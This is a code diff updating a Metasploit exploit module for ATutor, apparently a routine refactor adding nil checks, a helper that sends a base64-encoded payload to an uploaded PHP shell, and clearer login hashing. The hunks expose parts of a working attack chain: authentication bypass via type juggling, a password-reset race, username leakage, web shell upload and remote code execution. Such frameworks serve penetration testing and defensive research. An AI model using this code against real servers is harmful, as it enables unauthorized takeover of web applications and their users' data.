Update atutor_filemanager_traversal

Author: wchen-r7

modules/exploits/linux/http/atutor_filemanager_traversal.rb

@@ -129,7 +129,7 @@ def found
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"),
     })
-    if res.code == 200 and res.body =~ /#{@test_string}/
+    if res and res.code == 200 and res.body =~ /#{@test_string}/
       return true
     end
     return false
@@ -141,34 +141,30 @@ def disclose_web_root
       'uri'      => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"),
     })
     @webroot = "/"
-    @webroot << $1 if res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
+    @webroot << $1 if res and res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
     if @webroot != "/"
       return true
     end
     return false
   end
 
-  def exec_code
-    # pwnage
-    res = nil
+  def call_php(ext)
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.pht"),
+      'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"),
       'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
     }, timeout=0.1)
+    return res
+  end
+
+  def exec_code
+    res = nil
+    res = call_php("pht")
     if res == nil
-      res = send_request_cgi({
-        'method'   => 'GET',
-        'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.phtml"),
-        'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
-      }, timeout=0.1)
+      res = call_php("phtml")
     end
     if res == nil
-      res = send_request_cgi({
-        'method'   => 'GET',
-        'uri'      => normalize_uri(target_uri.path, "mods", "#{@payload_name}.php4"),
-        'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
-      }, timeout=0.1)
+      res = call_php("php4")
     end
   end
 
@@ -191,11 +187,7 @@ def upload_shell(cookie, check)
       return true
     end
     # unknown failure...
-    if res && res.body =~ /Missing zlib extensions/
-      fail_with(Failure::NotVulnerable, 'Server is missing zlib extensions')
-    else
-      fail_with(Failure::Unknown, 'Unable to upload php code')
-    end
+    fail_with(Failure::Unknown, "Unable to upload php code")
     return false
   end
 
@@ -209,7 +201,7 @@ def find_user(cookie)
       # use that session to leak the username
       'agent' => ''
     })
-    username = "#{$1}" if res.body =~ /<span id="login">(.*)<\/span>/
+    username = "#{$1}" if res and res.body =~ /<span id="login">(.*)<\/span>/
     if username
        return username
     end
@@ -251,7 +243,7 @@ def type_juggle
     fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication")
   end
 
-  def reset_password()
+  def reset_password
     # this is due to line 79 of password_reminder.php
     days = (Time.now.to_i/60/60/24)
     # make a semi strong password, we have to encourage security now :->
@@ -279,13 +271,13 @@ def reset_password()
     fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password")
   end
 
-  def login(username, hash, check=false)
-    password = Rex::Text.sha1(Rex::Text.sha1(hash))
+  def login(username, password, check=false)
+    hash = Rex::Text.sha1(Rex::Text.sha1(password))
     res = send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path, "login.php"),
       'vars_post' => {
-        'form_password_hidden' => password,
+        'form_password_hidden' => hash,
         'form_login' => username,
         'submit' => 'Login',
         'token' => '',
@@ -299,7 +291,7 @@ def login(username, hash, check=false)
       end
     end
     # auth failed if we land here, bail
-    if not check
+    unless check
       fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
     end
     return nil